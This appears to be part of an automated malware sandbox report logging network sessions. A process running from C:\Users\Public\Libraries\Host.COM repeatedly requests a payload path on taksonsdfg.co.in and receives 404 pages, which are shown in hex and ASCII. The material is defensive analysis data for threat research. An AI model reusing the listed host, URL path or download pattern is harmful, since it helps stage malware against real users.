                                                                                    2024-10-14 02:29:50 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:50 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    28192.168.2.449793108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:50 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:51 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:51 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:51 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:51 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    29192.168.2.449795108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:51 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:52 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:52 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:52 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:52 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    30192.168.2.449797108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:53 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:53 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:53 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:53 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:53 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    31192.168.2.449799108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:54 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:54 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:54 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:54 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:54 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    32192.168.2.449801108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:55 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:55 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:55 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:55 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:55 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    33192.168.2.449803108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:56 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:56 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:56 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:56 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:56 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    34192.168.2.449805108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:57 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:57 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:57 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:57 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
